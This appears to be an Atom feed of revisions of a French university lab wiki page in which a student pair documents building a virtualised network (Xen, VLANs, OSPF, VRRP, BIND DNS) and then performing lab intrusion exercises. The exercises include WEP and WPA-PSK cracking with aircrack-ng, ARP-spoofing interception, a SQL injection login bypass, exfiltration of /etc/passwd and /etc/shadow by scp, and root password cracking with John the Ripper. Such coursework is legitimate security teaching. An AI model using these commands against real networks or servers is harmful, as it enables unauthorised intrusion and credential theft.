http://honey.plil.info/phpmyadmin/ avec ce mot de passe, on accède au contenue des tables.&lt;br /&gt;
&lt;br /&gt;
Une table en particulier nous interesse: '''users''' dans la base '''test''', puisqu'elle contient les identifiant de connexion ('''rex''')&lt;br /&gt;
&lt;br /&gt;
===connexion au serveur===&lt;br /&gt;
On peut verifier que le serveur est bien accéssible a distance avec:&lt;br /&gt;
 nmap -6 honey.plil.info&lt;br /&gt;
qui nous renseigne que les services http et ssh sont accéssible sur la machine.&lt;br /&gt;
&lt;br /&gt;
On tente donc de se connecter en ssh avec les information récupérées dans la base de donnée.&lt;br /&gt;
&lt;br /&gt;
On a accès a tous les fichier de configuration et nottament les informations sur les utilisateurs que l'on récupère:&lt;br /&gt;
 scp /etc/passwd pifou@zabethXX:~/intrusion/passwd&lt;br /&gt;
 scp /etc/shadow pifou@zabethXX:~/intrusion/shadow&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Cassage du mot de passe root===&lt;br /&gt;
Pour la suite, nous utilisons les commandes de l'utilitaire '''John the Ripper'''.&lt;br /&gt;
La commande suivante nous permet de voir les mots de passe chiffrés des utilisateurs.&lt;br /&gt;
 unshadow ./passwd ./shadow | grep root &amp;gt; pass&lt;br /&gt;
On enregistre la clé de l'utilisateur '''root''' dans un fichier '''pass'''.&lt;br /&gt;
&lt;br /&gt;
Comme nous savons que le mot de passe suis la meme logique que le mot de passe administrateur habituel des machines de projets, on suppose qu'il s'agit d'un répétition de 2 mot de 4 lettre: abcdabcd. On génere un dictionnaire qui permettera de casser le mot de passe chiffé.&lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/' dico&lt;br /&gt;
&lt;br /&gt;
puis on lance le cassage:&lt;br /&gt;
 /usr/sbin/john -w:dico pass&lt;br /&gt;
&lt;br /&gt;
apres quelques minutes, le mot de passe est diponible en clair:&lt;br /&gt;
 /usr/sbin/john --show pass&lt;br /&gt;
&lt;br /&gt;
=Réalisations=&lt;br /&gt;
&lt;br /&gt;
===6.1  Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===6.2  Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
===6.3  Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===6.4  Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Egury</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53680</id>
		<title>TP sysres IMA5sc 2020/2021 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53680"/>
				<updated>2020-11-16T11:13:39Z</updated>
		
		<summary type="html">&lt;p&gt;Egury : /* 4.2  Serveur DNS (02/11/2020) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - Evan Gury &amp;amp; Vincent Dubois - trompettedelamort&lt;br /&gt;
&lt;br /&gt;
Informations générales&lt;br /&gt;
----------------------&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (VLAN333) !! Netmask (VLAN333) !! Gateway (VLAN333) !! Gateway 6509-E (VLAN333) !! Gateway 9200 (VLAN333) !! IP (publique)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=2  Installation des systèmes d’exploitation (12/10/2020)=&lt;br /&gt;
&lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
 xen-create-image --hostname=trompettedelamort --ip=100.64.0.28 --gateway=100.64.0.2 --netmask=255.255.255.0 --dir=/usr/local/xen --password=pasglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
* Création des disques de stockage sur le serveur de virtualisation (pour tout les binômes):&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton:&lt;br /&gt;
&lt;br /&gt;
** On réquisitionne les deux disques de 2,7To que l'on met dans un groupe&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
** On créer 2 partitions de 10Go pour chaque binôme:&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort1 storage&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort2 storage&lt;br /&gt;
 ...meme chose pour chaque groupe...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
** On formate nos partitions:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort1&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier de config de la VM (/etc/xen/trompettedelamort.cfg)&lt;br /&gt;
 vif = ['bridge=IMA5sc, ip=100.64.0.84, ...']&lt;br /&gt;
et on indique quel disque utiliser:&lt;br /&gt;
 disk       = [&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
             ]&lt;br /&gt;
&lt;br /&gt;
* Lancer la VM&lt;br /&gt;
 xl create -c /etc/xen/trompettedelamort.cfg&lt;br /&gt;
&lt;br /&gt;
Ensuite, sur la MV:&lt;br /&gt;
&lt;br /&gt;
* Montage et peuplement des partitions:&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
 # /home est vide donc rien a déplacer&lt;br /&gt;
&lt;br /&gt;
puis on démonte:&lt;br /&gt;
 umount /mnt/xvda3&lt;br /&gt;
 umount /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier /etc/fstab pour monter les répertoires '''var''' et '''home''' sur les partitions crées. On ajoute:&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
&lt;br /&gt;
et on applique les modification du fichier fstab:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=3  Architecture réseau=&lt;br /&gt;
&lt;br /&gt;
==3.1  L’architecture générale (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
La mise en service de l'infrastructure physique (démarrer les routeurs,connexions physiques entre eux et avec le routeur de l'école) a été principalement réalisés par le groupe 14.&lt;br /&gt;
&lt;br /&gt;
==3.2  Les réseaux virtuels (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
On créer deux VLAN:&lt;br /&gt;
* VLAN131 pour se connecter au routeur de l'école&lt;br /&gt;
* VLAN333 pour accéder aux machines virtuelles sur Capbreton&lt;br /&gt;
&lt;br /&gt;
Cette partie a partiellement été réalisée par le groupe 14 lors de la première séances&lt;br /&gt;
&lt;br /&gt;
==3.5  Interconnexion avec Internet IPv4(15/10/2020 &amp;amp; 02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Le réseau utilisé pour ce TP est le 193.48.57.176/28 (cohabitation avec les IMA2A5 qui ont 193.48.57.160/27). Nous avons donc a notre disposition 16 adresses IP (193.48.57.176 à 193.48.57.191) parmi lesquelles nous devons réserver :&lt;br /&gt;
* 1 adresse pour le réseau&lt;br /&gt;
* 1 adresse de Broadcast&lt;br /&gt;
* 1 adresse pour le routeur 1 (6509-E)&lt;br /&gt;
* 1 adresse pour le routeur 2 (9200)&lt;br /&gt;
* 1 adresse flottante pour les routeurs (redondance)&lt;br /&gt;
Ce qui nous laisse 11 adresses disponibles pour 13 groupes...Impossible&lt;br /&gt;
&lt;br /&gt;
L'idée est donc de créer un sous réseau 10.64.0.16/28 et de faire de de la Translation d'adresse (NAT) vers 193.48.57.176/28&lt;br /&gt;
Nous économisons ainsi les adresses des routeurs et de diffusion qui n'ont pas besoin d’être translatées.&lt;br /&gt;
&lt;br /&gt;
===OSPF===&lt;br /&gt;
L'OSPF permet aux routeurs dans un même domaine d'échanger des informations sur le réseau. Cela permet aux différents routeurs voisins d'avoir de meilleur tables de routages. On réalise donc cette étape sur les deux routeurs pour qu'ils s'echanges leurs tables entre eux mais également avec le routeur de l'école&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.176 255.255.255.0 null0   #Ajout d'une route vers le routeur pour pouvoir ping directement à partir du routeur&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.101                                 # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise  # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets                                                                                                                        &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF (Attention au masque inversé)&lt;br /&gt;
&lt;br /&gt;
On peut vérifier le bon fonctonnement avec un ping vers l'adresse globale routeur de l'école&lt;br /&gt;
 ping 193.48.57.48&lt;br /&gt;
&lt;br /&gt;
De plus, on constate de nouvelles routes partagé par le routeur de l'école (&amp;quot;O&amp;quot; au début de la ligne)&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
On fait la meme chose en changeant le router-id : 10.60.0.102&lt;br /&gt;
&lt;br /&gt;
===NAT===&lt;br /&gt;
On cherche à réaliser une translation d'IP (NAT static) et non une mascarade (injection = NAT Dynamic)&lt;br /&gt;
 ip nat inside source static network 100.64.0.16 193.48.57.176 /28&lt;br /&gt;
Cela permet d'associer les adresse non routées de 100.64.0.16 à 100.64.0.28 aux adresse routées de 193.48.57.176 à 193.48.57.188&lt;br /&gt;
Il faut ensuite indiquer ques sont les VLAN concernés par la translation:&lt;br /&gt;
 int vlan 131&lt;br /&gt;
  ip nat outside&lt;br /&gt;
  exit&lt;br /&gt;
 int  vlan 333&lt;br /&gt;
  ip nat inside&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
===Problème association OSPF et NAT===&lt;br /&gt;
Il semblerait que l'association de l'OSPF et du NAT soit plus complexe que prévu: les deux fonctionnent bien indépendamment mais pas ensemble. En effet, l'OSPF n'annonce pas les routes vers 100.64.0.16/28 donc aucune communication vers l'exterieur n'est possible.&lt;br /&gt;
&lt;br /&gt;
Pour palier à ce problème, on déclare 100.64.0.0/24 sur VLAN333 et annonce manuellement les routes entre 193.48.57.176 et 100.640.16 (plus de NAT).&lt;br /&gt;
La configuration du 9200 a été faite par M. Redon, on s'occupe du 6509-E :&lt;br /&gt;
 boot&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no ip address 193.48.57.161 255.255.255.224 #on enleve l'ancienne ip routée&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
on modifie également l'identifiant de l'ospf 1 qui était en conflit avec celui des IMA2A5:&lt;br /&gt;
 router ospf 1&lt;br /&gt;
 router-id 10.60.100.1&lt;br /&gt;
&lt;br /&gt;
Enfin, on ajoute la route vers notre MV à la main:&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28&lt;br /&gt;
&lt;br /&gt;
Puis on configure notre machine virtuelle de manière a ce qu'elle ait les deux IP (100.64.0.28 et 193.48.57.188)(cf. partie suivante). &lt;br /&gt;
&lt;br /&gt;
Les paquets venant de l'extérieur sont propagé à destination de 193.48.57.188 au routeur (6509-E ou 9200) puis vers 100.64.0.28 sur le VLAN333 suivant la route indiquée précédemment. Les paquets émis par notre machine virtuelle sont transmis à la passerelle par défaut (100.64.0.1 si 6509-E ou 100.64.0.2 si 9200) (comme spécifié avec le mot clé &amp;quot;src&amp;quot; lors de l'établissement des routes) puis le routeur connait les routes pour sortir en passant par le routeur de l'école.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.6  Interconnexion avec Internet (IPv6)(02/11/2020)==&lt;br /&gt;
Le groupe 14 c'est occupé de configurer le vlan333 pour qu'il utilise des ipv6&lt;br /&gt;
&lt;br /&gt;
On crée le VLAN301 pour notre domaine:&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.1 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High #car routeur principale&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.2 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference Low&lt;br /&gt;
&lt;br /&gt;
Annonce de route avec RIP fait par groupe 14&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.7  Sécurisation du réseau (02/11/2020)==&lt;br /&gt;
En partenariat avec le groupe 14.&lt;br /&gt;
Attention la syntaxe est différente entre le 9200 et le 6509-E&lt;br /&gt;
On configure la redondance avec l'adresse flottante pour les VLAN333 et VLAN1 ainsi que pour le notre VLAN301.&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 ip 100.64.0.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 33 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 33 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 31 ip 10.60.100.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 31 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 31 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 ip 10.60.101.254 # adresse flottante des routeur dans notre vlan&lt;br /&gt;
 vrrp 41 preemt&lt;br /&gt;
 vrrp 41 priority 110&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 100.64.0.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 1&lt;br /&gt;
 vrrp 31 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.100.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.101.254&lt;br /&gt;
 preemt&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
==3.8  Interconnexion Internet de secours (IPv4) (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
==3.9  Interconnexion Internet de secours (IPv6) (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
=4  Services Internet=&lt;br /&gt;
&lt;br /&gt;
==Connexion a internet (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Afin de mettre internet sur nos machines il faut au préalable modifier le fichier /etc/network/interfaces de nos VM:&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
   auto lo&lt;br /&gt;
   iface lo inet loopback&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
   auto eth0&lt;br /&gt;
   iface eth0 inet static&lt;br /&gt;
   address 193.48.57.188&lt;br /&gt;
   netmask 255.255.255.255&lt;br /&gt;
   up ip address add dev eth0 100.64.0.28/24&lt;br /&gt;
   up ip route add default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
   down ip address del dev eth0 100.64.0.28/24&lt;br /&gt;
   down ip route del default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
&lt;br /&gt;
L'adresse 193.48.57.188 correspond à notre adressé routée, l'adresse 100.64.0.28 est notre adresse sur le vlan333 et l'adresse 100.64.0.2 est l'adresse du routeur/commutateur 9200 sur le vlan333.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite ajouter la route sur le 9200 pour notre VM. Pour se faire on se connecte en ssh sur la zabeth09:&lt;br /&gt;
 ssh pifou@zabet09.plil.info&lt;br /&gt;
Et ensuite via minicom:&lt;br /&gt;
 minicom -os /dev/ttyACM0&lt;br /&gt;
On rentre la commande suivante (apres avoir fait enable et conf t au préalable):&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28 &lt;br /&gt;
&lt;br /&gt;
Nous avons désormais accès à internet sur nos VM et nous pouvons donc maintenant installer bind9 et configurer notre DNS.&lt;br /&gt;
&lt;br /&gt;
==4.1  Serveur SSH (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
==4.2  Serveur DNS (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Pour commencer dans le fichier de configuration /etc/resolv.conf nous avons mis comme adresse de serveur de nom &lt;br /&gt;
 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
Ensuite avec bind9 nous avons pu configurer notre serveur de nom.&lt;br /&gt;
Dans le fichier /etc/bind/named.conf.local nous avons défini notre zone &amp;quot;trompettedelamort.site&amp;quot;:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
Puis nous avons configuré le fichier db.trompettedelamort.site. Pour se faire nous avons pris le fichier par defaut db.local que nous avons copié puis modifié:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.trompettedelamort.site.  postmaster.trompettedelamoo&lt;br /&gt;
 rt.site(&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.trompettedelamort.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net&lt;br /&gt;
 @       IN      A       193.48.57.188&lt;br /&gt;
&lt;br /&gt;
Enfin sur gandi.net nous avons crée un glue record dans lequel nous avons mis l'adresse ip de notre machine virtuelle puis nous avons ajouté dans Nameservers. &lt;br /&gt;
ns6.gandi.net possedant déjà son glue record, nous avons simplement ajouté ce dernier dans Nameservers.&lt;br /&gt;
&lt;br /&gt;
==4.3  Sécurisation de site web par certificat (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
==4.4  Sécurisation de serveur DNS par DNSSEC (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
=Tests d’intrusion=&lt;br /&gt;
&lt;br /&gt;
==5.1  Exploitation de failles du système (en cours)==&lt;br /&gt;
&lt;br /&gt;
==5.2  Cassage de clef WEP d’un point d’accès WiFi (15/10/2020)==&lt;br /&gt;
&lt;br /&gt;
Avec le packetage aircrack-ng il est possible de casser une clef wep.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on récupère le nom de de notre interface WiFi et son adresse MAC avec :&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ensuite pour analyser les packets WiFi qui circulent sur le réseau on se sert de la commande:&lt;br /&gt;
 airodump-ng nomDeMaCarte&lt;br /&gt;
Se faisant, l'interface se met automatiquement en mode monitor.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite tester le Point d'accés avec une injection test:&lt;br /&gt;
 aireplay-ng -9 -e nomPA -a MACPA nomDeMaCarte&lt;br /&gt;
-9 permet de réaliser un test.&lt;br /&gt;
&lt;br /&gt;
Pour casser la clef WEP, l'algorithme nécessite le plus de vecteur d'initialisation possible. Pour récupérer ces derniers on se sert de la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w output nomDeMaCarte&lt;br /&gt;
-c 3 correspond au canal sur lequel émet notre PA, et output sera le fichier contenant tous les vecteurs d'initialisations.&lt;br /&gt;
&lt;br /&gt;
Pour accélérer l'acquisition de vecteurs d'initialisations,nous allons récupérer tous les paquets ARP émis par le PA et les réinjecter. A chaque réinjection les PA génère un nouveau vecteur d'initialisation, cette technique permet d'accélérer la collecte des vecteurs.&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'injection de paquet ARP dans le PA il faut d'abord associer la carte et le PA:&lt;br /&gt;
 aireplay-ng 1 0 -e nomPA -a MACPA -h MACcarte nomDeMaCarte&lt;br /&gt;
-1 correspond à une fausse authentification et 0 au délais de réassociation.&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons collecté suffisament de vecteurs nous pouvons lancer l'algorithme de cassage:&lt;br /&gt;
 aircrack-ng -b MACPA output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.3  Cassage de mot de passe WPA-PSK par force brute (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
On commence par mettre l'interface WiFi en mode monitor:&lt;br /&gt;
 airmon-ng start maCarte&lt;br /&gt;
&lt;br /&gt;
Ensuite on lance une écoute généralisée des trames WiFi qui circulent:&lt;br /&gt;
 airodump-ng maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de là on peut récupérer le BSSID, L'ESSID et le canal utilisé par le PA qui nous intéresse, nous avons pris la kracotte03.&lt;br /&gt;
&lt;br /&gt;
Puis pour cibler la recherche on lance la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w psk maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de la on attend un handshake (émis lors de la connexion d'un utilisateur au PA).&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré il n'y a plus qu'a lancer l'algorithme pour casser la PSK:&lt;br /&gt;
 aircrack-ng -w dictionnaire -b MACPA psk*.cap&lt;br /&gt;
&lt;br /&gt;
Il faut au préalable avoir un dictionnaire contenant toutes les combinaisons qui nous intéressent, dans notre un cas il nous faut toutes les combinaisons possibles sur 8bits en décimale.&lt;br /&gt;
Pour se faire soit on fait un petit programme générant toutes les combinaisons possibles, soit on se sert d'un outil de création de dictionnaire. Nous avons utilisé crunch avec la commande suivante:&lt;br /&gt;
 crunch 8 8 0123456789 -o dictionnaire&lt;br /&gt;
&lt;br /&gt;
Nous avons du attendre quelques heures avant que aircrack nous retourne la clef.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.4  Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP (06/11/2020)==&lt;br /&gt;
&lt;br /&gt;
N'ayant pas accès au eeePC (COVID19) on a créé deux machines virtuelles sur note machine personnelle pour simuler l'environement de TP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP1.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On transforme la machine '''attacker''' en routeur:&lt;br /&gt;
 attacker@attacker:~/ sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Puis on lance l'empoisonnement du cache ARP de la victime:&lt;br /&gt;
 attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 192.168.1.254&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que l'attaque a bien fonctionné en observant la table ARP de la victime:&lt;br /&gt;
 victime@victime:~/ /arp&lt;br /&gt;
 bbox.lan (192.168.1.254) at 08:00:27:34:f9:27&lt;br /&gt;
 ...&lt;br /&gt;
 attacker (192.168.1.44) at 08:00:27:34:f9:27&lt;br /&gt;
L'adresse MAC de la passerelle par défaut (ma box internet dans ce cas) est la même que celle de la machine '''attacker'''&lt;br /&gt;
&lt;br /&gt;
Lorsque la machine veut communiquer avec l'extérieur, elle passe donc automatiquement par la machine '''attacker''':&lt;br /&gt;
 victime@victime:~/ traceroute 8.8.8.8&lt;br /&gt;
 1 attacker (192.168.1.44)  0.456 ms  0.552 ms 0.537 ms&lt;br /&gt;
 2 bbox.lan (192.168.1.254) 5.071 ms 5.053 ms 4.965 ms&lt;br /&gt;
 ...&lt;br /&gt;
 9 dns.google (8.8.8.8)  13.306 ms 12.759 ms 12.551 ms&lt;br /&gt;
&lt;br /&gt;
On lance wireshark sur '''attacker''' et on se connecte a un site http quelconque sur ''''victime'''. On peut voir transiter en claire les identifiants et mot de passes utilisés pour se connecter au site.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP2.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Même chose avec un logiciel de conversation instantanée non chiffré.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web (04/11/2020)==&lt;br /&gt;
===Injection SQL===&lt;br /&gt;
On se rend sur le site http://honey.plil.info. Etant donnée que le but est de s'introduire sur le serveur, on se doute que ce n'est pas l'application la plus sécurisée du monde: une simpl injection SQL pourais faire l'affaire pour obtenir une liste des identifiants de connexion. On renseigne donc les champs '''Identifiant''' et '''Mot de passe''' avec la valeure:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
Bingo! L'application nous retourne un tableau avec des identifiant et mdp, on se connecter avec le profil '''admin'''&lt;br /&gt;
&lt;br /&gt;
===Base de donnée===&lt;br /&gt;
En fouillant un peu sur l'interface web, on se rend compte qu'on a accés a un fichier '''config-db.php ''' (dans l'onglet '''Recherche d'un manuel'''). Ce dernier nous renseigne le mot de passe root d'abministration de la base de donnée. En se connectant à l'interface d'administration du serveur de BDD&lt;br /&gt;
http://honey.plil.info/phpmyadmin/ avec ce mot de passe, on accède au contenue des tables.&lt;br /&gt;
&lt;br /&gt;
Une table en particulier nous interesse: '''users''' dans la base '''test''', puisqu'elle contient les identifiant de connexion ('''rex''')&lt;br /&gt;
&lt;br /&gt;
===connexion au serveur===&lt;br /&gt;
On peut verifier que le serveur est bien accéssible a distance avec:&lt;br /&gt;
 nmap -6 honey.plil.info&lt;br /&gt;
qui nous renseigne que les services http et ssh sont accéssible sur la machine.&lt;br /&gt;
&lt;br /&gt;
On tente donc de se connecter en ssh avec les information récupérées dans la base de donnée.&lt;br /&gt;
&lt;br /&gt;
On a accès a tous les fichier de configuration et nottament les informations sur les utilisateurs que l'on récupère:&lt;br /&gt;
 scp /etc/passwd pifou@zabethXX:~/intrusion/passwd&lt;br /&gt;
 scp /etc/shadow pifou@zabethXX:~/intrusion/shadow&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Cassage du mot de passe root===&lt;br /&gt;
Pour la suite, nous utilisons les commandes de l'utilitaire '''John the Ripper'''.&lt;br /&gt;
La commande suivante nous permet de voir les mots de passe chiffrés des utilisateurs.&lt;br /&gt;
 unshadow ./passwd ./shadow | grep root &amp;gt; pass&lt;br /&gt;
On enregistre la clé de l'utilisateur '''root''' dans un fichier '''pass'''.&lt;br /&gt;
&lt;br /&gt;
Comme nous savons que le mot de passe suis la meme logique que le mot de passe administrateur habituel des machines de projets, on suppose qu'il s'agit d'un répétition de 2 mot de 4 lettre: abcdabcd. On génere un dictionnaire qui permettera de casser le mot de passe chiffé.&lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
